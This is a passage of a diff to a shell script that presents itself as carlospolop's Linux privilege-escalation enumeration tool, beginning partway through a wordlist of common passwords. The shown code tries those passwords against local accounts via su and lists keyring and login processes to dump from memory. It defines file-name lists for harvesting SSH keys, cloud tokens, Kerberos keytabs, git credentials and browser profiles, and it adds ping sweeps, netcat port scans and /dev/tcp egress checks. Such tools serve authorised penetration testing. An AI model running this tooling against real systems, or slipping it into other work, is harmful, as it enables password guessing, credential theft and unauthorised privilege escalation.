0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive +plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" +PASSTRY="2000" #Default num of passwds to try (all by default) + +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +SEDOVERFLOW=true +for grp in `groups $USER | cut -d ":" -f2`; do + wgroups="$wgroups -group $grp -or " +done +wgroups="`echo $wgroups | sed -e 's/ -or$//'`" +while $SEDOVERFLOW; do + #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` + #if [ "$MACPEAS" ]; then + WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort` #OpenBSD find command doesn't have "-writable" option + #else + # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` + #fi + Wfolders=`printf "$WF" | tr '\n' '|'`"|[^\*][^\ ]*\ \*" + Wfolder="`printf "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1`" + printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" >/dev/null 2>&1 + if [ $? -eq 0 ]; then + SEDOVERFLOW=false + else + MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 + fi + if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop + SEDOVERFLOW=false + fi +done + +notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$" + +TIMEOUT="`command -v timeout 2>/dev/null`" +STRACE="`command -v strace 2>/dev/null`" +STRINGS="`command -v strings 2>/dev/null`" + +shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" + +notBackup="/tdbbackup$|/db_hotbackup$" + +cronjobsG=".placeholder|0anacron|0hourly|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart" +cronjobsB="centreon" + +processesVB="jdwp|tmux |screen |--inspect|--remote-debugging-port" +processesB="knockd\|splunk" +processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:" + +mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier" + +profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh" + +knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" + +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ureadahead-stop.timer" + +commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib64$|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" +commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" + +ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib" + +dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" + +########################################### +#---------) Checks before start (---------# +########################################### +# --) ps working good +# --) Network binaries + +if [ `ps auxwww 2>/dev/null | wc -l 2>/dev/null` -lt 8 ]; then + NOUSEPS="1" +fi + +DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" +FPING=$(command -v fping 2>/dev/null) +PING=$(command -v ping 2>/dev/null) +if [ "$FPING" ]; then + DISCOVER_BAN_GOOD="$GREEN$FPING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" +else + if [ "$PING" ]; then + DISCOVER_BAN_GOOD="$GREEN$PING$B is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" + fi +fi + +SCAN_BAN_BAD="No port scan capabilities (nc not found)" +FOUND_NC=$(command -v nc 2>/dev/null) +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v netcat 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v ncat 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.traditional 2>/dev/null); +fi +if [ -z "$FOUND_NC" ]; then + FOUND_NC=$(command -v nc.openbsd 2>/dev/null); +fi +if [ "$FOUND_NC" ]; then + SCAN_BAN_GOOD="$GREEN$FOUND_NC$B is available for network discover & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)" +fi + + +########################################### +#-----------) Main Functions (------------# +########################################### + +echo_not_found (){ + printf $DG"$1 Not Found\n"$NC +} + +echo_no (){ + printf $DG"No\n"$NC +} + +print_ps (){ + (ls -d /proc/*/ 2>/dev/null | while read f; do + CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess + if [ "$CMDLINE" ]; + then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`; + printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE"; + fi; + done) 2>/dev/null | sort -r +} + su_try_pwd (){ USER=$1 PASSWORDTRY=$2 trysu=`echo "$PASSWORDTRY" | timeout 1 su $USER -c whoami 2>/dev/null` if [ "$trysu" ]; then - echo " You can login as $USER using password: $PASSWORDTRY" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + echo " You can login as $USER using password: $PASSWORDTRY" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," fi } @@ -465,23 +538,29 @@ check_if_su_brute(){ fi } +eval_bckgrd(){ + CMD_PARAM="$1" + eval "$1" & + CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi +} + ########################################### #---------) Internet functions (----------# ########################################### check_tcp_80(){ - /bin/bash -c '(echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"' + (timeout -s KILL 20 /bin/bash -c '( echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 80 is not accessible" } check_tcp_443(){ - /bin/bash -c '(echo >/dev/tcp/1.1.1.8/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"' + (timeout -s KILL 20 /bin/bash -c '(echo >/dev/tcp/1.1.1.1/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 443 is not accessible" } check_icmp(){ - /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "icmp is available" || echo "icmp is not available") 2>/dev/null | grep "available"' + (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available" } #DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp #I cannot use this function because timeout doesn't find it, so it's copy/pasted below check_dns(){ - /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' + (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available" } ########################################### @@ -490,7 +569,7 @@ check_dns(){ # Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh basic_net_info(){ - printf $B"============================( "$GREEN"Basic Network Info"$B" )=============================\n"$NC + printf $B"═══════════════════════════╣ "$GREEN"Basic Network Info"$B" ╠═════════════════════════════\n"$NC (ifconfig || ip a) 2>/dev/null echo "" } @@ -509,11 +588,11 @@ icmp_recon (){ #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) - (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & - (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & for j in $(seq 0 254) do - (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -E "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & done wait } @@ -528,7 +607,7 @@ tcp_recon (){ for port in $PORTS; do for j in $(seq 1 254) do - ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -E "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & done wait done @@ -538,7 +617,7 @@ tcp_port_scan (){ #Scan open ports of a host. Default: nmap top 1000, but the user can select others basic_net_info - printf $B"===================================( "$GREEN"Network Port Scanning"$B" )===================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Network Port Scanning"$B" ╠═══════════════════════════════════\n"$NC IP=$1 PORTS="$2" PORTS="`echo \"$PORTS\" | tr ',' ' '`" @@ -553,7 +632,7 @@ tcp_port_scan (){ fi for port in $PORTS; do - ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -E "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & done wait } @@ -562,7 +641,7 @@ discover_network (){ #Check if IP and Netmask are correct and the use fping or ping to find hosts basic_net_info - printf $B"====================================( "$GREEN"Network Discovery"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Network Discovery"$B" ╠════════════════════════════════════\n"$NC DISCOVERY=$1 IP=$(echo $DISCOVERY | cut -d "/" -f 1) @@ -576,7 +655,7 @@ discover_network (){ #Using fping if possible if [ "$FPING" ]; then - $FPING -a -q -g $DISCOVERY | sed -E "s,.*,${C}[1;31m&${C}[0m," + $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${C}[1;31m&${C}[0m," #Loop using ping else @@ -602,7 +681,7 @@ discovery_port_scan (){ basic_net_info #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 - printf $B"============================( "$GREEN"Network Discovery (scanning ports)"$B" )=============================\n"$NC + printf $B"═══════════════════════════╣ "$GREEN"Network Discovery (scanning ports)"$B" ╠═════════════════════════════\n"$NC DISCOVERY=$1 MYPORTS=$2 @@ -652,42 +731,15 @@ if ! [ "$NOTEXPORT" ]; then fi -########################################### -#-----------) Starting Output (-----------# -########################################### - -echo "" -if [ !"$QUIET" ]; then print_banner; fi -printf $B" $SCRIPTNAME $VERSION ${Y}by carlospolop\n"$NC; -echo "" -printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC -echo "" -printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC -echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," -echo " RED/YELLOW: 99% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m," -echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m," -echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m," -echo " Blue: Users without console & mounted devs" | sed "s,Blue,${C}[1;34m&${C}[0m," -echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${C}[1;32m&${C}[0m," -echo " LightMangeta: Your username" | sed "s,LightMagenta,${C}[1;95m&${C}[0m," -if [ "$IAMROOT" ]; then - echo "" - echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${C}[1;31;103m&${C}[0m," - sleep 3 -fi -echo "" -echo "" - - ########################################### #-----------) Some Basic Info (-----------# ########################################### -printf $B"====================================( "$GREEN"Basic information"$B" )=====================================\n"$NC +printf $B"════════════════════════════════════╣ "$GREEN"Basic information"$B" ╠════════════════════════════════════\n"$NC printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -E "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" printf $LG"Hostname: "$NC hostname 2>/dev/null printf $LG"Writable folder: "$NC; @@ -703,7 +755,7 @@ if [ "$SCAN_BAN_GOOD" ]; then else printf $RED"[-] $SCAN_BAN_BAD\n"$NC fi -if [ "`which nmap 2>/dev/null`" ];then +if [ "`command -v nmap 2>/dev/null`" ];then NMAP_GOOD=$GREEN"nmap$B is available for network discover & port scanning, you should use it yourself" printf $Y"[+] $NMAP_GOOD\n"$NC fi @@ -755,10 +807,10 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep ########################################### prep_to_find() { - echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/\\( -name "/g' | sed 's/$/" \\)/g' + echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/ -name "/g' | sed 's/$/" /g' } - printf $GREEN"Caching directories "$NC + printf $GREEN"Caching directories using$Y $THREADS$GREEN threads "$NC SYSTEMD_RELEVANT_NAMES="*.service" TIMERS_RELEVANT_NAMES="*.timer" SOCKETS_RELEVANT_NAMES="*.socket" @@ -767,9 +819,10 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep MYSQL_RELEVANT_NAMES="mysql" POSTGRESQL_RELEVANT_NAMES="pgadmin*.db pg_hba.conf postgresql.conf pgsql.conf" APACHE_RELEVANT_NAMES="sites-enabled 000-default" - PHP_RELEVANT_NAMES="sess_* *config*.php" + PHP_RELEVANT_NAMES="sess_* *config*.php database.php db.php storage.php" WORDPRESS_RELEVANT_NAMES="wp-config.php" DRUPAL_RELEVANT_NAMES="settings.php" + MOODLE_RELEVANT_NAMES="/config.php" TOMCAT_RELEVANT_NAMES="tomcat-users.xml" MONGO_RELEVANT_NAMES="mongod*.conf" SUPERVISORD_RELEVANT_NAMES="supervisord.conf" @@ -782,7 +835,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep OVPN_RELEVANT_NAMES="*.ovpn" SSH_RELEVANT_NAMES="id_dsa* id_rsa* known_hosts authorized_hosts authorized_keys *.pem *.cer *.crt *.csr *.der *.pfx *.p12 agent* config vault-ssh-helper.hcl .vault-token" CLOUD_KEYS_RELEVANT_NAMES="credentials credentials.db legacy_credentials.db access_tokens.db accessTokens.json azureProfile.json cloud.cfg" - KERBEROS_RELEVANT_NAMES="krb5.conf" + KERBEROS_RELEVANT_NAMES="krb5.conf krb5.keytab .k5login kadm5.acl" KIBANA_RELEVANT_NAMES="kibana.y*ml" KNOCK_RELEVANT_NAMES="knockd" LOGSTASH_RELEVANT_NAMES="logstash" @@ -796,10 +849,23 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" IRSSI_RELEVANT_NAMES=".irssi" KEYRING_RELEVANT_NAMES="keyrings *.keyring *.keystore" + FILEZILLA_RELEVANT_NAMES="filezilla" + BACKUPMANAGER_RELEVANT_NAMES="storage.php database.php" + PASSWD_SPLUNK_RELEVANT_NAMES="passwd" + GITLAB_RELEVANT_NAMES="secrets.yml gitlab.yml gitlab.rb" + PGP_RELEVANT_NAMES="*.pgp *.gpg .gnupg" + VIM_RELEVANT_NAMES=".*.swp .viminfo" + DOCKER_RELEVANT_NAMES="docker.sock docker.socket Dockerfile docker-compose.yml" + FIREFOX_RELEVANT_NAMES=".mozilla" + CHROME_RELEVANT_NAMES="google-chrome" + AUTOLOGIN_RELEVANT_NAMES="autologin autologin.conf" + FASTCGI_RELEVANT_NAMES="fastcgi_params" + SNMP_RELEVANT_NAMES="snmpd.conf" DB_RELEVANT_NAMES="*.db *.sqlite *.sqlite3 *.sql" - INSTERESTING_RELEVANT_NAMES="*_history .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv Dockerfile docker-compose.yml .viminfo .ldaprc" + INSTERESTING_RELEVANT_NAMES=".msmtprc .env .google_authenticator *_history .recently-used.xbel .lesshst .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv .ldaprc" PASSWORD_RELEVANT_NAMES="*password* *credential* creds*" + BACKUPS_DIRS_RELEVANT_NAMES="backup backups" FIND_SYSTEMD_RELEVANT_NAMES=$(prep_to_find "$SYSTEMD_RELEVANT_NAMES") @@ -813,6 +879,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep FIND_PHP_RELEVANT_NAMES=$(prep_to_find "$PHP_RELEVANT_NAMES") FIND_WORDPRESS_RELEVANT_NAMES=$(prep_to_find "$WORDPRESS_RELEVANT_NAMES") FIND_DRUPAL_RELEVANT_NAMES=$(prep_to_find "$DRUPAL_RELEVANT_NAMES") + FIND_MOODLE_RELEVANT_NAMES=$(prep_to_find "$MOODLE_RELEVANT_NAMES") FIND_TOMCAT_RELEVANT_NAMES=$(prep_to_find "$TOMCAT_RELEVANT_NAMES") FIND_MONGO_RELEVANT_NAMES=$(prep_to_find "$MONGO_RELEVANT_NAMES") FIND_SUPERVISORD_RELEVANT_NAMES=$(prep_to_find "$SUPERVISORD_RELEVANT_NAMES") @@ -839,75 +906,70 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep FIND_IPSEC_RELEVANT_NAMES=$(prep_to_find "$IPSEC_RELEVANT_NAMES") FIND_IRSSI_RELEVANT_NAMES=$(prep_to_find "$IRSSI_RELEVANT_NAMES") FIND_KEYRING_RELEVANT_NAMES=$(prep_to_find "$KEYRING_RELEVANT_NAMES") + FIND_FILEZILLA_RELEVANT_NAMES=$(prep_to_find "$FILEZILLA_RELEVANT_NAMES") + FIND_BACKUPMANAGER_RELEVANT_NAMES=$(prep_to_find "$BACKUPMANAGER_RELEVANT_NAMES") + FIND_PASSWD_SPLUNK_RELEVANT_NAMES=$(prep_to_find "$PASSWD_SPLUNK_RELEVANT_NAMES") + FIND_GITLAB_RELEVANT_NAMES=$(prep_to_find "$GITLAB_RELEVANT_NAMES") + FIND_PGP_RELEVANT_NAMES=$(prep_to_find "$PGP_RELEVANT_NAMES") + FIND_VIM_RELEVANT_NAMES=$(prep_to_find "$VIM_RELEVANT_NAMES") + FIND_DOCKER_RELEVANT_NAMES=$(prep_to_find "$DOCKER_RELEVANT_NAMES") + FIND_FIREFOX_RELEVANT_NAMES=$(prep_to_find "$FIREFOX_RELEVANT_NAMES") + FIND_CHROME_RELEVANT_NAMES=$(prep_to_find 